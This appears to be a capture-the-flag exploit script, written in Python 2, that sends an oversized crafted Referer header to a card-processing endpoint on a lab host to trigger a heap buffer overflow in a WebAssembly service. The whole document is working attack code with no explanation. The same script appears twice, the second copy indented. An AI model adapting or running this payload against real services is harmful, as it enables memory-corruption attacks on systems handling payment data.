Jinmo/wasm_heap_bof?.py

## wasm_heap_bof?.py
import requests

sess=requests.Session()
HOST,PORT='10.13.37.8',8888

# overflow_len: http://
# overflow_payload <- suffix

append=u'a\u3fff'.encode('utf8')
append=bytes(append)
print `append`

payload=('http://'*(len(append))).ljust(999-len(append),'a')+append

m,y='10','22'
number='0'

url='http://'+HOST+':'+str(PORT)+'/cc/process.js?card-number='+number+'&expiry-month='+m+'&expiry-year='+y
r = sess.get(url, headers={
	'Referer': payload
	}, allow_redirects=False)
print r.headers
	import requests

	sess=requests.Session()
	HOST,PORT='10.13.37.8',8888

	# overflow_len: http://
	# overflow_payload <- suffix

	append=u'a\u3fff'.encode('utf8')
	append=bytes(append)
	print `append`

	payload=('http://'*(len(append))).ljust(999-len(append),'a')+append

	m,y='10','22'
	number='0'

	url='http://'+HOST+':'+str(PORT)+'/cc/process.js?card-number='+number+'&expiry-month='+m+'&expiry-year='+y
	r = sess.get(url, headers={
	'Referer': payload
	}, allow_redirects=False)
	print r.headers